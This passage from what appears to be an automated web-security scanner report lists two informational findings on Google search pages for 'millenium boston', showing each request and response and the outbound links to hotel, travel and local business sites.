<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CFEQoAIwAw')" title="Millenium Day Care Center" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background: url('/images/red_icons_bg_A_J.png') no-repeat;background-position: 0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CFEQoAIwAw')" title="Millenium Day Care Center"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CFUQoAIwBA')" title="Millenium Day Care Center" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background: url('/images/red_icons_bg_A_J.png') no-repeat;background-position: 0 -38px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CFUQoAIwBA')" title="Millenium Day Care Center"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.milleniumdental.net/" class=l onmousedown="return clk(this.href,'','','','8','','0CGEQoAIwBw')" title="Yazigi Ernerst" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background: url('/images/red_icons_bg_A_J.png') no-repeat;background-position: 0 -152px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.milleniumdental.net/" class=l onmousedown="return clk(this.href,'','','','8','','0CGEQoAIwBw')" title="Yazigi Ernerst"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHEQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MzOkyzIz36sJ:www.millenniumdaycare.com/+millenium+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CHMQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html" class=l onmousedown="return clk(this.href,'','','','12','','0CHUQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:bmUY5UzYdb4J:www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html+millenium+boston&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CHsQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/" class=l onmousedown="return clk(this.href,'','','','13','','0CHwQFjAM')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MZVl6Tm27rwJ:www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/+millenium+boston&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CH4QIDAM')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milleniumdental.net/" class=l onmousedown="return clk(this.href,'','','','14','','0CIABEBYwDQ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lcu5kWLyNDEJ:www.milleniumdental.net/+millenium+boston&cd=14&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','14','','0CIIBECAwDQ')">Cached</a>
...[SNIP]...
</div><img src="http://img.youtube.com/vi/zphTL6asEcc/default.jpg?h=60&w=80&sigh=___EvKb_9iWZZWaS_p66vlKVYToNc=" alt="" align=middle border=1 height=60 id=vidthumb15 style=";padding:1px 1px" width=80><div style="margin-top:-23px;margin-right:4px;text-align:right">
...[SNIP]...
<td valign=top style="padding:5px 10px 0 0"><a href="http://www.youtube.com/watch?v=zphTL6asEcc" class=l onmousedown="return clk(this.href,'','14886740032398037447','','15','','0CIQBELcCMA4')"><em>
...[SNIP]...
</div><img src="http://img.youtube.com/vi/iHkBLYEKQ-w/default.jpg?h=60&w=80&sigh=__sM81olyQYHqMjdBtsVanoARVtf8=" alt="" align=middle border=1 height=60 id=vidthumb16 style=";padding:1px 1px" width=80><div style="margin-top:-23px;margin-right:4px;text-align:right">
...[SNIP]...
<td valign=top style="padding:5px 10px 0 0"><a href="http://www.youtube.com/watch?v=iHkBLYEKQ-w" class=l onmousedown="return clk(this.href,'','9833892556290278380','','16','','0CIcBELcCMA8')">04-Backstreet Boys Live in <em>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Millennium_Place" class=l onmousedown="return clk(this.href,'','','','17','','0CIwBEBYwEA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:LdrDMcGpc-0J:en.wikipedia.org/wiki/Millennium_Place+millenium+boston&cd=17&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','17','','0CI4BECAwEA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mill-im.com/" class=l onmousedown="return clk(this.href,'','','','18','','0CJABEBYwEQ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MZCRUYsHAAMJ:www.mill-im.com/+millenium+boston&cd=18&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','18','','0CJIBECAwEQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/" class=l onmousedown="return clk(this.href,'','','','19','','0CJQBEBYwEg')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NGLhWghEPy0J:www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/+millenium+boston&cd=19&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','19','','0CJkBECAwEg')">Cached</a>
...[SNIP]...

17.272. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=related:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&tbo=1&sa=X&ei=_CVITc2VBYOClAeFy82iBA&ved=0CE4QHzAC

The response contains the following links to other domains:

http://travel.yahoo.com/p-hotel-345569-millennium_bostonian_hotel_boston-i
http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:73ltHzN6lQoJ:www.frommers.com/destinations/boston/H31492.html+&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MZVl6Tm27rwJ:www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/+&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:X_v6MWapU3QJ:www.tripadvisor.com/LocationPhotos-g60745-d114150-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:kknKXdYPlYEJ:travel.yahoo.com/p-hotel-345569-millennium_bostonian_hotel_boston-i+&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:mjsXPr3yvg8J:www.tripadvisor.com/Hotel_Review-g60745-d77629-Reviews-Best_Western_Terrace_Inn-Boston_Massachusetts.html+&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:p8OtZ_s0wUwJ:www.superducktours.com/+&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:rY6gm-BBWnkJ:www.allgetaways.com/hotels/hotel-detail.asp%3Fhotelid%3D36881+&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:rs61nFuj2QEJ:www.tripadvisor.com/Hotel_Review-g60745-d234752-Reviews-Nine_Zero_Hotel_a_Kimpton_Hotel-Boston_Massachusetts.html+&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.allgetaways.com/hotels/hotel-detail.asp?hotelid=36881
http://www.frommers.com/destinations/boston/H31492.html
http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/
http://www.millenniumhotels.com/millenniumboston/index.html
http://www.millenniumhotels.com/millenniumboston/specials/index.html
http://www.superducktours.com/
http://www.tripadvisor.com/Hotel_Review-g60745-d234752-Reviews-Nine_Zero_Hotel_a_Kimpton_Hotel-Boston_Massachusetts.html
http://www.tripadvisor.com/Hotel_Review-g60745-d77629-Reviews-Best_Western_Terrace_Inn-Boston_Massachusetts.html
http://www.tripadvisor.com/LocationPhotos-g60745-d114150-Millennium_Bostonian_Hotel-Boston_Massachusetts.html
http://www.youtube.com/results?hl=en&q=related:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?hl=en&q=related:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&tbo=1&sa=X&ei=_CVITc2VBYOClAeFy82iBA&ved=0CE4QHzAC HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:48:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>related:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachus
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=related:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://travel.yahoo.com/p-hotel-345569-millennium_bostonian_hotel_boston-i" class=l onmousedown="return clk(this.href,'','','','1','','0CBUQFjAA')">Millennium Bostonian Hotel <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:kknKXdYPlYEJ:travel.yahoo.com/p-hotel-345569-millennium_bostonian_hotel_boston-i+&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBgQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/" class=l onmousedown="return clk(this.href,'','','','2','','0CBoQFjAB')">Millennium Bostonian Hotel <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MZVl6Tm27rwJ:www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/+&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CBwQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tripadvisor.com/LocationPhotos-g60745-d114150-Millennium_Bostonian_Hotel-Boston_Massachusetts.html" class=l onmousedown="return clk(this.href,'','','','3','','0CB4QFjAC')">Photos of Millennium Bostonian Hotel, <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:X_v6MWapU3QJ:www.tripadvisor.com/LocationPhotos-g60745-d114150-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCAQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/index.html" class=l onmousedown="return clk(this.href,'','','','4','','0CCIQFjAD')">Downtown <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CCQQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.frommers.com/destinations/boston/H31492.html" class=l onmousedown="return clk(this.href,'','','','5','','0CCUQFjAE')">Millennium Bostonian Hotel Review - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:73ltHzN6lQoJ:www.frommers.com/destinations/boston/H31492.html+&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CCcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.allgetaways.com/hotels/hotel-detail.asp?hotelid=36881" class=l onmousedown="return clk(this.href,'','','','6','','0CCkQFjAF')">Millennium Bostonian Hotel <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rY6gm-BBWnkJ:www.allgetaways.com/hotels/hotel-detail.asp%3Fhotelid%3D36881+&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:rY6gm-BBWnkJ:www.allgetaways.com/hotels/hotel-detail.asp%3Fhotelid%3D36881+&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com','','','','6','','0CC0QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/specials/index.html" class=l onmousedown="return clk(this.href,'','','','7','','0CC8QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CDEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tripadvisor.com/Hotel_Review-g60745-d77629-Reviews-Best_Western_Terrace_Inn-Boston_Massachusetts.html" class=l onmousedown="return clk(this.href,'','','','8','','0CDIQFjAH')">Best Western Terrace Inn (<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mjsXPr3yvg8J:www.tripadvisor.com/Hotel_Review-g60745-d77629-Reviews-Best_Western_Terrace_Inn-Boston_Massachusetts.html+&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CDUQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tripadvisor.com/Hotel_Review-g60745-d234752-Reviews-Nine_Zero_Hotel_a_Kimpton_Hotel-Boston_Massachusetts.html" class=l onmousedown="return clk(this.href,'','','','9','','0CDcQFjAI')">Nine Zero Hotel - a Kimpton Hotel (<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rs61nFuj2QEJ:www.tripadvisor.com/Hotel_Review-g60745-d234752-Reviews-Nine_Zero_Hotel_a_Kimpton_Hotel-Boston_Massachusetts.html+&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CDoQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superducktours.com/" class=l onmousedown="return clk(this.href,'','','','10','','0CDwQFjAJ')">Super Duck Tours | Narrated Duck Tours of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:p8OtZ_s0wUwJ:www.superducktours.com/+&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CD4QIDAJ')">Cached</a>
...[SNIP]...

17.273. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=millenium+boston

The response contains the following links to other domains:

http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+millenium+boston&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+millenium+boston&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MZCRUYsHAAMJ:www.mill-im.com/+millenium+boston&cd=17&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MZVl6Tm27rwJ:www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/+millenium+boston&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MzOkyzIz36sJ:www.millenniumdaycare.com/+millenium+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:NGLhWghEPy0J:www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/+millenium+boston&cd=18&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:VlMvBwJVSh4J:www.oyster.com/boston/hotels/millennium-bostonian/+millenium+boston&cd=19&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Xle3EKG2cb4J:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:bmUY5UzYdb4J:www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html+millenium+boston&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:lcu5kWLyNDEJ:www.milleniumdental.net/+millenium+boston&cd=14&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/
http://www.mill-im.com/
http://www.milleniumdental.net/
http://www.millenniumdaycare.com/
http://www.millenniumhotels.com/millenniumboston/attractions/
http://www.millenniumhotels.com/millenniumboston/facilities/
http://www.millenniumhotels.com/millenniumboston/gallery/index.html
http://www.millenniumhotels.com/millenniumboston/index.html
http://www.millenniumhotels.com/millenniumboston/restaurant/
http://www.millenniumhotels.com/millenniumboston/rooms/
http://www.millenniumhotels.com/millenniumboston/specials/index.html
http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html
http://www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html
http://www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/
http://www.oyster.com/boston/hotels/millennium-bostonian/
http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html
http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html
http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=w1
http://www.youtube.com/watch?v=GNJ209hycpA
http://www.youtube.com/watch?v=zphTL6asEcc

Request

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:25:48 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/GeNLY2f-.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 95515

<!doctype html><head><title>millenium boston - Google Search</title><script>window.google={kEI:"_CVITc2VBYOClAeFy82iBA",kEXPI:"17259,17291,27615,27683,27946,28067,28187,28387",kCSI:{e:"17259,17291,276
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/index.html" class=l onmousedown="return clk(this.href,'','','','1','','0CDAQFjAA')">Downtown <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+millenium+boston&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CDUQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/specials/index.html" onmousedown="return clk(this.href,'','','','1','','0CDYQqwMoADAA')">Specials & Packages</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/restaurant/" onmousedown="return clk(this.href,'','','','1','','0CDcQqwMoATAA')">Restaurants & Bars</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/rooms/" onmousedown="return clk(this.href,'','','','1','','0CDgQqwMoAjAA')">Guest Rooms</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/gallery/index.html" onmousedown="return clk(this.href,'','','','1','','0CDkQqwMoAzAA')">Take a Picture Gallery Tour</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/attractions/" onmousedown="return clk(this.href,'','','','1','','0CDoQqwMoBDAA')">Location & Attractions</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/facilities/" onmousedown="return clk(this.href,'','','','1','','0CDsQqwMoBTAA')">Facilities</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html" onmousedown="return clk(this.href,'','','','1','','0CDwQqwMoBjAA')">Bed & Breakfast Package</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html" onmousedown="return clk(this.href,'','','','1','','0CD0QqwMoBzAA')">Banquets & Meetings</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/specials/index.html" class=l onmousedown="return clk(this.href,'','','','2','','0CEAQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+millenium+boston&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CEUQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html" class=l onmousedown="return clk(this.href,'','','','3','','0CEcQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Xle3EKG2cb4J:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CE0QIDAC')">Cached</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CE8QoAIwAw')" title="Millenium Day Care Center" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background: url('/images/red_icons_bg_A_J.png') no-repeat;background-position: 0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CE8QoAIwAw')" title="Millenium Day Care Center"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CFYQoAIwBA')" title="Millenium Day Care Center" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background: url('/images/red_icons_bg_A_J.png') no-repeat;background-position: 0 -38px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CFYQoAIwBA')" title="Millenium Day Care Center"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.milleniumdental.net/" class=l onmousedown="return clk(this.href,'','','','8','','0CGsQoAIwBw')" title="Yazigi Ernerst" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background: url('/images/red_icons_bg_A_J.png') no-repeat;background-position: 0 -152px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.milleniumdental.net/" class=l onmousedown="return clk(this.href,'','','','8','','0CGsQoAIwBw')" title="Yazigi Ernerst"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CIQBEBYwCg')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MzOkyzIz36sJ:www.millenniumdaycare.com/+millenium+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CIkBECAwCg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/" class=l onmousedown="return clk(this.href,'','','','12','','0CIsBEBYwCw')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MZVl6Tm27rwJ:www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/+millenium+boston&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CJABECAwCw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html" class=l onmousedown="return clk(this.href,'','','','13','','0CJIBEBYwDA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:bmUY5UzYdb4J:www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html+millenium+boston&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CJsBECAwDA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milleniumdental.net/" class=l onmousedown="return clk(this.href,'','','','14','','0CJwBEBYwDQ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lcu5kWLyNDEJ:www.milleniumdental.net/+millenium+boston&cd=14&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','14','','0CKEBECAwDQ')">Cached</a>
...[SNIP]...
<td valign=top style="padding:5px 10px 0 0"><a href="http://www.youtube.com/watch?v=zphTL6asEcc" class=l onmousedown="return clk(this.href,'','14886740032398037447','','15','','0CKMBELcCMA4')"><em>
...[SNIP]...
<td valign=top style="padding:5px 10px 0 0"><a href="http://www.youtube.com/watch?v=GNJ209hycpA" class=l onmousedown="return clk(this.href,'','1788622654261064336','','16','','0CKoBELcCMA8')">15-Backstreet Boys Live in <em>
...[SNIP]...
<h3 class="r"><a href="http://www.mill-im.com/" class=l onmousedown="return clk(this.href,'','','','17','','0CLMBEBYwEA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MZCRUYsHAAMJ:www.mill-im.com/+millenium+boston&cd=17&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','17','','0CLgBECAwEA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/" class=l onmousedown="return clk(this.href,'','','','18','','0CLoBEBYwEQ')"><em>
...[SNIP]...
